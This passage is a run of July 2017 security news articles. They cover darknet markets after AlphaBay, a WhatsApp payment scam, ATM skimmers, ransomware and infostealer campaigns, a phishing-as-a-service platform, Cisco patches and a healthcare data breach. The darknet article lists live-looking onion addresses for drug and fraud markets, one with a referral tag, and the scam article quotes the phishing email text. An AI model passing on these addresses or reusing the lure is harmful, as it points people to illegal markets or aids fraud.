Besides this, the company also agreed to 20 years' worth of the FTC overseeing its network security to ensure that its user data is being protected. This includes:
Performing a risk assessment to protect customer data.
Implementing new data security protocols.
Upgrading systems based on the assessments.
Offering periodic security risk assessment (both internal and third-party).
Requiring "reasonable safeguards" against any potential cyber attacks from their service providers.
Now, according to Reuters, the company has to pay $11.2 million to users who were affected by the breach – users with valid claims can get up to $3,500 depending on their losses attributable to the breach.


Windows 10 Will Now Let You Reset Forgotten Password Directly From the Lock Screen
17.7.2017 thehackernews Safety

Microsoft is making every effort to make its Windows 10 Fall Creators Update bigger than ever before by beefing up its security practices and hardening it against hackers and cyber attacks in its next release.
Microsoft is finally adding one of the much-requested features to Windows 10: Pin and Password recovery option directly from the lock screen.
Yes, the next big update of Windows 10, among other features, will allow you to recover your forgotten pin and password, allowing you to reset your Windows password directly from the lock screen.
In Windows 10 Fall Creators Update, you will see "Reset password" or "I forgot my PIN" options on the login screen along with the sign-in box, mspoweruser confirmed.

Once you click on the option, Windows 10 will take you to the OOBE where Cortana will help you reset your password, after you successfully verify your identity using either your secondary email, your phone number, or Microsoft Authenticator.

A verification code will be sent to the option you chose, and once you entered and verified your identity, you will be able to reset the password and regain access to your computer directly from the login screen.
The tech giant is currently testing this new feature in its Windows 10 Insiders build 16237, making it much easier for them to recover their Microsoft Accounts.
You can use this option if you have either activated the Windows Hello authentication system or have a PIN to secure your account.
With the launch of Windows 10 Creator Update (also known as RedStone 3), which is expected to release sometime between September and October 2017, the company has already planned to:
Remove the 30-year-old SMB v1 file sharing protocol.
Build AI-powered antivirus software.
Build its EMET anti-exploit tool into the kernel of the operating system.
Support three different flavours of the Linux OS – Ubuntu, Fedora, and SUSE – directly through their Windows Store.
Add new anti-ransomware feature, called Controlled Folder Access, as part of its Windows Defender.
Besides this new upgrade, Windows 10 Fall Update also includes improvements to Acrylic Material translucency effects, Task Manager, Mixed Reality headset and much more.
You can check out the complete list here.


What’s new after the AlphaBay Market Shutdown in the darkweb?
17.7.2017 securityaffairs  CyberCrime

Authorities shut down Alphabay, wondering which will be the marketplace that will reach the top and which will be the impact on the criminal ecosystem?
AlphaBay was shut down by law enforcement and the alleged mastermind committed suicide in jail while waiting for the extradition to the US.

The event will have a significant impact on the cyber criminal underground, now it is interesting to analyze the evolution of the others black marketplaces in order to understand which will be the biggest one in the next months.

A good source could be the Dark Net Markets Comparison Chart published by the website DeepDotWeb.com, it integrates marketplace data with the hidden Dark Net Markets List ratings, along with uptime status data provided by our monitoring system and creation dates from Gwern.net.

The researchers at DeepDotWeb used the following parameter to evaluate the popularity of each market, data is relayed to the past 28 days until July 12.

Impressions & Clicks – These two features give us an indication of the number of pages from this site will appear on Google for search queries containing the market name.
Searches on the site – is simple how many times people entered the site search terms that relate to the specific market in DeepDotWeb’s internal search.
Hits on related pages: How many visits there were on pages inside deepdotweb that their focus is some specific market (filtered using google analytics).

The table proposed by the DeepDotWeb shows that the Russian black marketplace RAMP (Russian Anonymous Marketplace) and DreamMarker are the biggest markets after the shutdown of the AlphaBay, followed by the Hansa Market.

RAMP after alphabay

RAMP marketplace (http://ramp5bb7v2abm34a.onion) is a Russian marketplace having a forum-like organization, it is frequented by prominent hackers from Eastern Europe.

Due to the forum-like structure, the products are not organized into categories, it is not easy to calculate the exact number of listings or vendors on RAMP.

RAMP is operating since September 2012, it is probably the oldest running darknet market! It has already outlived its rivals Silk Road, Agora, and AlphaBay.

It is not clear how RAMP survived so long, there are some speculations regarding its longevity, someone believes that the main reason is that it is a Russian focused market.

There are four main categories of vendors on RAMP:

Audited Dealers
Private Points
Market
Miscellaneous
The Audited Dealers group includes the more reliable group of vendors.

Like black marketplace, RAMP lists several prohibited posts and discussions about illegal goods and activities, including drugs, pornography and child pornography, weapons, fake documents. and banknotes.

“Based on the statistics presented on the forum at the time we did this review, RAMP had 186,304 users; 13,224 created topics, 931,494 posts (all time), and 88 posts for the week. These numbers show that RAMP is indeed a significant darknet community.” states the analysis published on the website Darknetmarkets.co.”The longevity and popularity of Russian Anonymous Marketplace appear surprising to some especially as the site claims to make around a quarter of a million every year but RAMPs’ owners believe that this is because it is in Russian and serves predominantly Russian users. Also, it could be due to its focus on drugs and prohibition of hacking and pornography.”

The Dream Market (http://lchudifyeqm4ldjj.onion/?ai=1675) has been around since Nov/Dec 2013, it is an excellent aggregator for buyers and sellers of any kind of drugs (i.e. Cannabis, Benzos, Ecstasy, etc.).
The filtering feature makes it easy to search the items offered on the black market places.

The listing for Digital Goods is growing with sellers offering mostly fraud-related goods, such as stolen account data, stolen credit card data (CV, CCV) and fake documents.

Many sellers offer guides and tutorials on hacking and other illegal activities such as carding, it is also possible to find counterfeit banknotes from many countries. Hacking services are skinny, no significant deals are available. Same story for purchasing and customizing malware, it is quite easy to find well-known RATs and Keylogger, but this isn’t the right place where to find complex malware.

http://lchudifyeqm4ldjj.onion/?ai=1675

The remain markets are smaller and the values of parameters used for the analysis demonstrate it.

NAME IMPRESSIONS CLICKS SEARCHS ON SITE HITS ON RELATED PAGES
Alphabay (Defunct) 323,452 67,713 1,116 408,016
RAMP (Russian) 58,618 23,413 363 210,271
Dream Market 56,430 32,467 451 227,470
Hansa Market 55,629 16,811 1 98,090
Silk road 3.1 10,418 1,048 10 14,365
House of lions 74 25 1 9,023
Darknet Heroes League 578 275 11 7,499
Apple market 177 14 2,680 6,727
WALL ST Market 885 68 4 5,593
The Majestic garden 2,353 849 1 4,655
CGMC 811 244 5 3,576
Zion Market 327 14 3 3,325
TradeRoute 260 103 7 3,061
Pyramid market 9 0 0 2,699
Pekarmarket 8 4 1 1,932
RSclub 69 32 0 1,538
Tochka 50 11 104 396


Did you receive a WhatsApp subscription ending email or text? Watch out!
17.7.2017 securityaffairs 
Social

Did you receive a WhatsApp subscription ending email or text? Watch out! It is a scam to steal your payment and personal data.
Researcher Graham Cluley is warning of bogus ‘WhatsApp subscription ending’ emails and texts.

Internet users are receiving an email pretending to be from WhatsApp and warning them of the ending for an alleged WhatsApp subscription.

Although the company stopped requesting any payment since January 2016, crooks are attempting to exploit the fact that in the past, WhatsApp used to ask users to pay a fee after they had been using the service for a year.

Using this social engineering attack, crooks aim to trick users into clicking links including in the messages that might result in they handing their payment information over to attackers.

“Have you received an email claiming to come from WhatsApp that warns that you have been using the service for more than one year and that it’s time to take out a subscription?”

“Beware! The emails are, of course, a scam designed to trick you into clicking links that might result in you handing your payment information over to fraudsters.” states the blog post published by Graham Cluley on the ESET blog.

whatsapp scam email

WhatsApp scam subscription-expired

Below a portion of the malicious email:

Your subscription is ending soon

Please update your payment information now

UPDATE YOUR PAYMENT INFORMATION

Our records indicate that your WhatsApp trial service is exceeding the one year period. At the completion of your trial period your WhatsApp will no longer be able to send or receive message. To continue using WhatsApp without interruption, we need you to subscribe for any of our subscription periods.

As usual, you should always be wary of unsolicited email messages and SMS text messages claiming to come from WhatsApp demanding payments or the verification of your account’s credentials.

“You ultimately decide what links you click on, and whether you hand over your passwords and payment card details. Always think twice, because the wrong decision could prove costly.” concluded Graham Cluley.


Crooks used Infrared insert skimmers in a recent wave of ATM attacks
16.7.2017 securityaffairs
Attack

The number of cyber attacks against ATM involving so-called ‘insert skimmers’ is increasing. Bran Krebs wrote about recent attacks using infrared devices.
The number of cyber attacks against ATM involving so-called ‘insert skimmers’ is increasing. Insert Skimmers are wafer-thin fraud devices designed to fit invisibly inside the ATM card slot.

Insert Skimmers are able to capture card data and store it on an embedded flash memory.

The popular cyber security expert Brian Krebs reported in some cases the use of insert skimmers that are able to transmit stolen card data wirelessly via infrared.

The infrared is a short-range communication technology, every day we use it when we change TV program with a television remote control.

Krebs cited a case that has happened a few weeks ago in the Oklahoma City metropolitan area where at least four banks were victims of ATM attacks involving insert skimmers.
The KFOR news channel quoted a local police detective saying “the skimmer contains an antenna which transmits your card information to a tiny camera hidden somewhere outside the ATM.”

insert skimmers
An insert skimmer retrieved from a compromised cash machine in Oklahoma City. Image: KrebsOnSecurity.com.

Krebs confirmed that financial industry sources tell him that preliminary analysis of the insert skimmers used in the ATM attacks confirms they were equipped with technology to transmit stolen card data wirelessly to the hidden camera using infrared.

The insert skimmers used to compromise cash machines in Oklahoma City were equipped with the hidden that was used to record time-stamped videos of ATM users entering their PINs and to receive card data recorded and transmitted by the insert skimmer.

This design helps crooks in reducing maintenance activities for the skimmers, for example when they need to substitute the internal battery, they could leave the device in the ATM slot and swap out the hidden camera.

The skimmers are optimized to preserve battery, according to Krebs the insert skimmer also uses an embedded battery that is turned on only when someone inserts a card into the ATM slot.

The spy cameras are deployed to remain hidden, crooks use tiny pinholes cut into false fascias that they install above or beside the PIN pad.
“Thieves involved in skimming attacks have hidden spy cameras in some pretty ingenious places, such as a brochure rack to the side of the cash machine or a safety mirror affixed above the cash machine (some ATMs legitimately place these mirrors so that customers will be alerted if someone is standing behind them at the machine).” wrote Krebs.

“More often than not, however, hidden cameras are placed behind tiny pinholes cut into false fascias that thieves install directly above or beside the PIN pad. Unfortunately, I don’t have a picture of a hidden camera used in the recent Oklahoma City insert skimming attacks.”

Let me suggest covering the pin pad with your hand when you enter it, in this case, the hidden camera will not be able to record it. Krebs also wars of non-video methods to obtain the PIN (such as PIN pad overlays), but he explains that these devices are rare and more expensive for fraudsters.

If you are searching more information about Skimmers devices check out Brian Krebs’s series All About Skimmers.


NemucodAES ransomware and Kovter trojan bundled in the same campaigns
16.7.2017 securityaffairs
Ransomware

Security experts at the SANS Institute discovered that that NemucodAES ransomware and Kovter trojan are being delivered together in spam campaigns.
Security experts at the SANS Institute Internet Storm Center, discovered that that two malware families, NemucodAES and Kovter are being delivered together in .zip attachments delivered via active spam campaigns.

Security Researcher Brad Duncan noticed in the last couple of weeks a significant increase in malicious spam delivering .zip archives with JavaScript files used to download and execute the NemucodAES ransomware and Kovter click-fraud malware.

NemucodAES is a variant of the Nemucod Trojan downloader, known for being used in different campaigns in 2016 distributing Locky and TeslaCrypt ransomware.

“By March 2016, we started seeing reports of ‘Nemucod ransomware’ that stopped downloading ransomware binaries in favor of using its own script-based ransomware component,” Duncan wrote in a SANS Institute Internet Storm Center posted Friday.

“And now in July 2017, we see the next phase of Nemucod ransomware: NemucodAES. Emisoft states this new variant is written in JavaScript and PHP. It uses AES and RSA to encrypt a victim’s files.”

The NemucodAES ransomware is easy to neutralize due to the availability of a decryptor, meanwhile, Kovter click-fraud is a fileless malware hard to detect. Kovter was also used by threat actors to steal personal information and download and execute additional malicious payloads.

Spam campaigns deliver the malicious .zip archives disguised as notices from the United Parcel Service.

“Malspam with Zip archives containing JavaScript files are easy for most organizations to detect… But some of these messages might slip past your filtering, and some people could possibly get infected. With the NemucodAES decryptor, people can recover their files, but I expect this ransomware will continue to evolve,” Duncan wrote.

Kovter was packaged with other ransomware in past campaigns, in February, experts at Microsoft’s Malware Protection Center spotted malicious email campaigns using .lnk attachments to spread Locky ransomware and Kovter.

Back to the recent campaign, NemucodAES and Kovter were bundled in malicious .zip archives. When victims unpack the archives a JavaScript file is extracted.

“Network traffic was typical for an infection by one of the .js files. We first see HTTP requests for the NemucodAES JavaScript, followed by requests for various executables. Then we see the post-infection Kovter traffic. NemucodAES doesn’t generate any traffic on its own,” according to the research report.

The NemucodAES ransomware encrypt files without appending any info to the original file names, then it delivers in the “AppData\Local\Temp” directory instructions (via an .hta file) to decrypt the files. It also uses a Windows desktop background (a .bmp file) as the ransomware note.

NemucodAES ransomware

Victims are requested to pay a $1,500 ransom in Bitcoin.

Experts are investigating the presence of the Kovter malware in the campaigns. Kovter seems to be used only to check traffic and generating command-and-control traffic.

“I see a lot of post-infection events for Kovter command and control traffic. But I’m not certain click-fraud is involved any more,” Duncan said.

Give a look at the SANS’s analysis for further details about this campaign.


How encryption can help startups in protecting their data
16.7.2017 securityaffairs Safety

The deployment of encryption in modern businesses does not only guarantee hundred percent security but it also reduces the surface of attack.
Data protection has become the top objective for many businesses in the world today. Especially after the ransomware incident, hacked credit card databases and the Apple leak. Businesses are scratching their heads in anticipation of what could hit them next?

It is a brilliant idea from the executives to prioritize data protection over everything. Nonetheless, it is equally difficult to harmonize security processes across several systems and devices. Even the most cautious and watchful business owners can leave out data unprotected.

Encryption is highly regarded as one of the best-sought solutions for this problem. The deployment of encryption in computers, cloud systems, mobile phones and other business avenues does not only guarantee hundred percent security but it also substantially eliminates the potential of being attacked and incurring financial loss.

encryption

How does encryption work?

Creating a synergy with other security measures, encryption secures the data and its trafficking to other parties. After being encrypted, a file becomes impossible to crack or decipher, and it becomes difficult to break into sensitive or valuable business information.

How can business owners encrypt their company’s data?

As a responsible and clever business owner, you must place a high emphasis on data breaches and financial losses, and this can only be achieved by employing complete encryption of devices and network. Encryption can be implemented and help in the following areas for protection of your valuable data:

Wi-Fi Hotspots
A laptop acts as a blessing when traveling and you require access to company files, but using an unsecured Wi-Fi public hotspot can backfire pretty badly and make you vulnerable to attacks.

Emails
With email becoming the standard medium for the exchange of sensitive information, it is equally important to keep the process encrypted to avoid losing information to data thieves. All businesses should engage in premium level encryption to protect their data, irrespective of whether probable hackers possess physical access to computers or not.

Passwords
Your password is an essential element of encryption. To make the password hack-proof, make it long; 10 or more characters is advisable. The code should consist both upper and lower case letters, numbers, and special characters. It is recommended to keep separate passwords for each system and device, and document them in a safe place if remembering them is a hard job to do.

Cloud
Despite its attractiveness such as affordability, convenience, and sharing, Cloud Storage solutions are quite vulnerable to external attacks. Dropbox and other big names in the Cloud storage scene offer built-in data encryption of your data stored on their servers. But, the point to be highlighted here is that they also hold the decryption keys, which, in certain situations might be used to access your stored information. There are many products which give an extra protection layer to cloud storage locations.

Search Engines
Like it or not, Google, Yahoo, and other search engines will catalog every search you perform on the internet. Your online web search choices are then attached to your computer’s IP address and are subsequently used to customize the advertising and searches for your machine. This cataloging might seem unobtrusive and perhaps even useful, but it is also a risk for future public embarrassment and social faux pas. Don’t let these search engines store your searches for ‘anti-depressants,’ ‘love advice,’ ‘divorce lawyers,’ and ‘anger management’. To avoid it, a VPN browser can help you cloak your IP address so you can keep your private searches private. If you are connected to a VPN, your online traffic is redirected to a 3rd party server, which encrypts the information.

USB and External Drives
Portable data storage and plug and play devices sure are useful, but attached with it are the theft/loss strings. Gladly, products such as BitLocker To Go, helps keep portable storage drives encrypted when fallen into the wrong hands.

A password to open a company PC would be useless if one can get away with the hard disk. All it would require is, to connect the hard drive to another system and alas, access to all the data right in front. To avoid this mishap, Microsoft BitLocker software for Ultimate Windows 7 or Vista (or the Enterprise or Pro Windows 8), that offers complete hard drives encryption. To turn on the feature, just go to Control Panel > System and Security > BitLocker Drive Encryption.

In a Nutshell…

Guarding your sensitive information against theft and vulnerability isn’t a tough task in today’s digital world, particularly with the progressive adoption of cloud computing. The fact of the matter is, despite all the security measures, sometimes, hackers and cyber criminals still can find their way through a company’s or individual’s system, making it vulnerable to date theft or data leakage.

For that reason, it is said to consider prudently what (and when) you want to save on the cloud, and consult with a professional cloud services provider to find out what encryption level suits you best.

In the modern business environment, which is increasingly depending upon on computers and cloud-based storage, nothing is or at least should be, dearer to you than a rock-solid encryption strategy which can ensure your long-term safety and success.


Hackshit PhaaS platform, even more easy to power Phishing campaigns
16.7.2017 securityaffairs
Phishing

The experts from Netskope Threat Research Labs discovered the Hackshit PhaaS platform, another interesting case of crimeware-as-a-service.
A few days ago, we discussed the Katyusha scanner,a powerful and fully automated SQLi vulnerability scanner discovered by researchers at security firm Recorded Future that was available for $500 in the cyber crime underground.

The Katyusha scanner is just one of the numerous hacking tools and crimeware-as-a-service available in the hacking community.

Today I desire to present you another crimeware-as-a-service that was discovered by the experts from Netskope Threat Research Labs dubbed Hackshit.

The Hackshit is a Phishing-as-a-Service (PhaaS) platform that offers low cost, “automated solution for the beginner scammers,” it allows wannabe crooks to easily launch a phishing campaign.

Dubbed Hackshit, the PhaaS platform attracts new subscribers by offering them free trial accounts to review their limited set of hacking tutorials and tricks to make easy money.

“Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of ‘The marketing of products or services deemed’. The victim’s credentials are sent to the Hackshit PhaaS platform via websockets. ” states a blog post published by Netskope.

The researchers discovered the PhaaS platform during a research about the trends of CloudPhishing attacks. They observed a phishing page using data URI scheme to serve base64 encoded content (data:text/html;base64) delivered from “https://a.safe.moe,” accessing the link the researchers were presented a phished login page for Google Docs.

Once the victims have provided their credentials, they presented another phishing page whose source uses a data URI scheme to serve base64 encoded content (data:text/html;base64) again from https://a.safe.moe.

This second phished page was designed to trick victims into providing recovery details of their email account. Once the victim has provided his details, he is redirected to the original Google recovery page.

The experts decoded the two phishing pages and discovered that the credentials are sent to the attacker via a websocket to https://pod[.]logshit[.]com and https://pod-1[.]logshit[.]com.

“Accessing logshit[.]com led us to the discovery of the PhaaS website named Hackshit as shown in Figure 6. Further research concluded the website is serving as a PhaaS platform.” continues the blog post.

Hackshit

Hackshit is a PhaaS platform that offers several phishing services and it also implements a black marketplace to buy and sell such kind of services.

“The marketplace is a portal that offers services to purchase and sell for carrying out the phishing attacks,” Netskope researcher Ashwin Vamshi explained.

“The attacker then generates a phished page from the page/generator link and logs into the email account of the compromised victim, views all the contacts and sends an email embedded with the phished link.”

Crooks can purchase site login accounts of compromised victim from the marketplace using Perfect Money or bitcoins.

Using the Hackshit, subscribers can easily generate their unique phishing pages for many popular services, including Yahoo, Facebook, and Gmail.

Experts also noticed that the Hackshit website uses an SSL certificate issued by the open certificate authority Let’s Encrypt.

Let’s see which is the pricing model behind the PhaaS, Hackshit offers several subscription tiers from Starter to Master, ranging from 40 USD per week to 250 USD for 2 months.

Hackshit demonstrated that crimeware-as-a-service represent a serious risk for businesses and end-users, it is bringing wannabe hackers into the cybercrime arena.


CISCO issues security patches for nine serious RCEs in SNMP subsystem in IOS and IOS XE
15.7.2017 securityaffairs
Vulnerebility

Cisco has fixed nine serious remote code execution flaws in the SNMP subsystem running in all the releases of IOS and IOS XE software.
The tech giant publicly disclosed the vulnerability on June 29 and provided workarounds, not it is notifying customers about the availability of security patches.

The nine issues, that have been tracked with codes from CVE-2017-6736 to CVE-2017-6744, were all patched by the company. All the flaws could be exploited by a remote unauthenticated attacker by sending specially crafted SNMP packets, resulting in arbitrary code execution or causing the system to reload.

“The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE Software contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities.” states the advisory published by CISCO in June.

The experts warned of nine flaws affecting the Simple Network Management Protocol (SNMP) component of IOS and IOS XE software.

The flaws are due to a buffer overflow condition in the SNMP subsystem, all versions of SNMP – Versions 1, 2c, and 3 are affected.

Cisco SNMP

As reported by the advisory, an authenticated attacker who knows the SNMP read-only community string of a target system could remotely execute code or cause the device to reload by sending a specially crafted SNMP packet via IPv4 or IPv6.

The attack is very dangerous because hackers could obtain full control of vulnerable devices and the worst news is that CISCO warned customers that attackers in the wild know about the vulnerabilities and can exploit them in any moment.

“A successful exploit could allow the attacker to execute arbitrary code and obtain full control of the affected system or cause the affected system to reload,” Cisco said in its advisory.

Cisco confirmed that any device configured with a list of particular management information base (MIBs) is also vulnerable. MIBs are databases associated with SNMP implementations and are used to manage devices in a communication network.

CISCO when disclosed the issued The company’s original workaround recommendation was to disable the affected MIBs.

Devices configured with any of the following MIBs are vulnerable:

ADSL-LINE-MIB
ALPS-MIB
CISCO-ADSL-DMT-LINE-MIB
CISCO-BSTUN-MIB
CISCO-MAC-AUTH-BYPASS-MIB
CISCO-SLB-EXT-MIB
CISCO-VOICE-DNIS-MIB
CISCO-VOICE-NUMBER-EXPANSION-MIB
TN3270E-RT-MIB
“Some of the MIBs may not be present on all systems or versions but are enabled when present,” continued the Cisco advisory.

“Administrators may be accustomed to utilizing the show snmp mib command in privileged EXEC mode to display a list of enabled MIBs on a device,” Cisco said. “Not all of the MIBs will be displayed in the output of the show snmp mib command but may still be enabled.” Customers were advised to implement the entire exclude list.

CISCO customers need to apply the patches, the company also recommends network managers to regularly change community strings, which are used to restrict read/write access to SNMP data on a device running IOS or IOS XE.

“These community strings, as with all passwords, should be chosen carefully to ensure they are not trivial,” Cisco said. “They should also be changed at regular intervals and in accordance with network security policies.”


Ovidiy Stealer a cheap and efficient infostealer offered for sale
15.7.2017 securityaffairs
Virus

A new infostealer malware dubbed Ovidiy Stealer was offered for sale by a Russia-speaking malware developer that goes online with the moniker “TheBottle.”
TheBottle has advertised the malware on various cybercrime forums.

The Ovidiy Stealer was first spotted in June 2017, according to the experts at security firm Proofpoint the malware is under development and is gaining popularity in the cyber criminal underground.

“Proofpoint threat researchers recently analyzed Ovidiy Stealer, a previously undocumented credential stealer which appears to be marketed primarily in the Russian-speaking regions. It is under constant development, with several updated versions appearing since the original samples were observed in June 2017. The growing number of samples demonstrate that criminals are actively adopting this malware.” states the analysis published by Proofpoint.

Ovidiy Stealer

The infostealer is offered for sale on a Russian website for 450-750 Rubles ($7-$13), according to the malware researchers, the low price is because the malware isn’t so efficient as other malicious codes available on the market.

Malware experts at Proofpoint discovered the Ovidiy Stealer is currently being spread via email as executable attachments, compressed executable attachments, and links to an executable download.

“It is also likely spread via file hosting / cracking / keygen sites, where it poses as other software or tools. In several cases, we observed the Ovidiy Stealer bundled with a “LiteBitcoin” installer, further validating this claim.” continues the analysis.

The experts claim the Ovidiy Stealer is not complex, it doesn’t obtain boot persistence and currently implements only a few features.

It can collect and steal information from many popular applications, including:

FileZilla
Google Chrome
Kometa browser
Amigo browser
Torch browser
Orbitum browser
Opera browser
Once the malware has siphoned the information from the victims it sends it back to a control panel that is used by all the subscribers to access them. The panel is published on the same server that hosts the website, at ovidiystealer.ru, an operation choice that shows the lack of experience of the author.

Another TheBottle’s mistake is the use of RoboKassa for payments, it is a PayPal-like money processor based in Russia that does not ensure users’ anonymity.

“Ovidiy Stealer is a new password stealer that entered the criminal ranks barely one month ago. While it is not the most advanced stealer we have seen, marketing and an entry-level price scheme make it attractive and accessible to many would-be criminals. Ovidiy Stealer is lightweight and simple enough to work with relative ease, allowing for simple and efficient credential exfiltration.” concluded Proofpoint.”A lightweight, easy-to-use, and effective product coupled with frequent updates and a stable support system give Ovidiy Stealer the potential to become a much more widespread threat. “


Risk Intelligence Firm Flashpoint Raises $28 Million

15.7.2017 securityweek Security

Flashpoint, a New York, NY-based threat intelligence and research company that focuses on what it calls “Business Risk Intelligence” (BRI) gleaned from combing the Deep & Dark Web, has raised $28 million in Series C funding.

The company goes beyond what many traditional cyber threat intelligence providers collect, which typically includes technical indicators such as IP addresses, domains, and signatures. Flashpoint collects information and monitors conversations in the underground, including cybercriminal groups and terrorist organizations such as the Islamic State (Daesh) and its supporters.

According to the company, the additional funding will help support adoption of its BRI offerings and support the recruitment of additional threat intelligence analysts.

As Flashpoint explains, the company provides customers with “visibility into real threats with the potential to harm them and the context to help them understand how these threats could impact their business.”

"Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," warned Flashpoint in its Business Risk Intelligence - Decision Report, published in January 2017. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

Flashpoint says its customer base includes industries such as finance, retail, insurance, healthcare, law, media, energy, technology, telecommunications, defense, aviation, entertainment, hospitality, consumer goods, and manufacturing. The company counts several Fortune 500 and government organizations as customers.

Led by new investor Georgian Partners, the Series C round also included investors Greycroft Partners, TechOperators, Leaders Fund, Jump Capital, Bloomberg Beta, and Cisco Investments also participated in the round. Robert Herjavec, founder and CEO of security firm Herjavec Group and investor on ABC's hit show, Shark Tank, was an early investor in the company, SecurityWeek has confirmed.

The company previously raised $10 million in Series B funding in July 2016 and announced its expansion from cyber threat intelligence into business risk intelligence.

Josh Lefkowitz, CEO and co-founder of Flashpoint, is a SecurityWeek columnist.


Atlassian Launches Public Bug Bounty Program

15.7.2017 securityweek Security

Team collaboration and productivity software provider Atlassian announced this week the launch of a Bugcrowd-based public bug bounty program with rewards of up to $3,000 per vulnerability.

Atlassian has been running a private bug bounty program and the company has now decided to take advantage of all the 60,000 researchers who have signed up on the Bugcrowd platform to help find security holes in its products.

The initiative covers Confluence and JIRA products, including Android and iOS mobile apps, and *.atlassian.io domains hosting services that interact with the company’s products. Bug bounty hunters will have to create their own Atlassian cloud instances using their Bugcrowd email address.Atlassian launches bug bounty program

Other products, the Atlassian websites, customer cloud instances, billing systems, internal or development services, and third-party add-ons are out of scope.

The company is interested in cross-instance data leakage and access, remote code execution, server-side request forgery (SSRF), reflected and stored cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, XML external entity (XXE), access control, and directory traversal flaws.

As for rewards, most of the targeted products qualify for “tier 1” rewards. Critical vulnerabilities in these products can earn researchers up to $3,000, while the least serious flaws are worth $100. Confluence Team Calendars is the only “tier 2” product and the maximum reward is $1,500 per flaw.

Since the launch of its bug bounty program, Atlassian has paid out rewards for 39 vulnerabilities, with the average payout at roughly $500.

“The economics of bug bounties are too overwhelming to ignore,” said Daniel Grzelak, head of security at Atlassian. “Our traditional application security practice produces great results early in the lifecycle and deep in our services, but the breadth and depth of post-implementation assurance provided by the crowd really completes the secure development lifecycle. Multiplying the specialization of a single bounty hunter by the size of the crowd creates a capability that just can’t be replicated by individual organizations.”


Dark Web Market AlphaBay Goes Down

15.7.2017 securityweek CyberCrime

AlphaBay, a Dark Web markerplace for illegal products, went down last week after authorities seized equipment following raids in three different countries.

Following the incident, vendors selling their products on AlphaBay began to flock to other Dark Web marketplaces, a transition that apparently started to cause technical issues on some of these portals. AlphaBay supposedly had over 400,000 users last week.

AlphaBay was the most popular marketplace on the Dark Web, followed by RAMP (Russian), Dream Market, Hansa Market, and Silk road 3.1. Launched in December 2014 and already having over 200,000 users by October 2015, AlphaBay saw an influx of users after a similar portal called TheRealDeal disappeared last summer.

The exact reason for AlphaBay’s demise remains unclear at the moment, but there is some speculation that its admins might have pulled off an exit scam, shutting down the portal and stealing crypto-currency from escrow wallets, BleepingComputer’s Catalin Cimpanu notes.

Others, however, suggest the marketplace was taken down after authorities raided various locations in the United States, Canada and Thailand on July 5. AlphaBay went down the same day the raids happened, and the Wall Street Journal reports the law enforcement operation resulted in the portal’s shutdown.

Authorities apparently confirmed three raids in Canada and another in Thailand, but didn’t confirm that they were related to the Dark Web marketplace. While only equipment was reportedly seized in Canada, Alexander Cazes, 26, was arrested in Thailand, where authorities seized assets valued at over $11 million.

Cazes, supposedly the individual running AlphaBay, allegedly gave his consent to be extradited to the United States after a request from the Federal Bureau of Investigation. On Wednesday morning, he was found dead in his cell at the Narcotics Suppression Bureau in Bangkok's Laksi district.

Ilia Kolochenko, CEO of web security company High-Tech Bridge, pointed out in an emailed comment to SecurityWeek that, although there’s no safe harbor for cybercriminals operating illegal marketplaces such as AlphaBay, the portal’s demise is likely to result in miscreants taking measures to better secure their operations.

“Dark Web gives an illusion of safety and anonymity to many unexperienced users. This case is a good example that there is no safe harbor for cybercrime marketplaces operating on the global scale. Users erroneously believe that bitcoin or tor can assure their undetectability, but this assumption is wrong. There are many other ways to trace and unmask them via weaknesses in tangential technologies, or just by using social engineering or even their own garrulity against them,” Kolochenko said.

Last year, 35-year-old Aaron James Glende from Winona, Minnesota, was sentenced to four years and two months in prison for selling stolen information on AlphaBay. In January this year, a Reddit user demonstrated he could read any private message the dark web marketplace.

“However, this news is rather a bad one in the long run. I think, other illegal market places will quickly learn the lesson and take all measures to secure their platforms and operators. We will probably see many new smaller places restricted only to ‘trusted’ sellers and verified buyers. This will seriously impede any further investigation and police raids,” Kolochenko concluded.

Earlier this year, darknet marketplace Hansa announced the launch of a bug bounty program with rewards of up to 10 bitcoins, in an effort to minimize chances of the website being hacked.


Insider Steals Customer Data From Global Healthcare Group

15.7.2017 securityweek Incindent

Major International Healthcare Organization Bupa Loses Customer Details to Insider Threat

Bupa, a major international healthcare group, announced yesterday, "We recently discovered an employee of our international health insurance division (which is called 'Bupa Global'), had inappropriately copied and removed some customer information from the company.

Sheldon Kenton, Managing Director at Bupa Global, announced, "Around 108,000 international health insurance policies are affected," and added; "The data taken includes: names, dates of birth, nationalities, and some contact and administrative details including Bupa insurance membership numbers."

DataBreaches soon added some detail. "DataBreaches.net first became aware of the Bupa breach on June 23, when a listing appeared on the now-gone Alpha Bay marketplace by a vendor calling himself 'MoZeal'." MoZeal was a new member to AlphaBay, having joined on 2 May 2017; and DataBreaches conjectures "that 'MoZeal' is likely the rogue employee that Kenton referred to."

DataBreaches provided the full list of stolen data as provided by MoZeal, which turns out to be more expansive than that provided by Bupa. It includes separate home and office fax, email address, mobile and landline phone numbers. DataBreaches also questions the Bupa statement. "While Bupa reports that 108,000 were affected, MoZeal's listing and thread indicated that there were over 130,000 in the U.K. alone, and that overall there were about 500,000 – 1 million records for sale."

SecurityWeek asked Bupa to clarify this, and was told, "All of the information and statements we have made public this week remain valid. We are aware of a report that suggests that on 23 June 2017 'a former employee claimed to have 1m records for sale'. Our thorough investigation established that 108,000 policies, covering 547,000 customers, had been copied and removed. The disparity in numbers claimed and those taken relates to duplicate copies of some records."

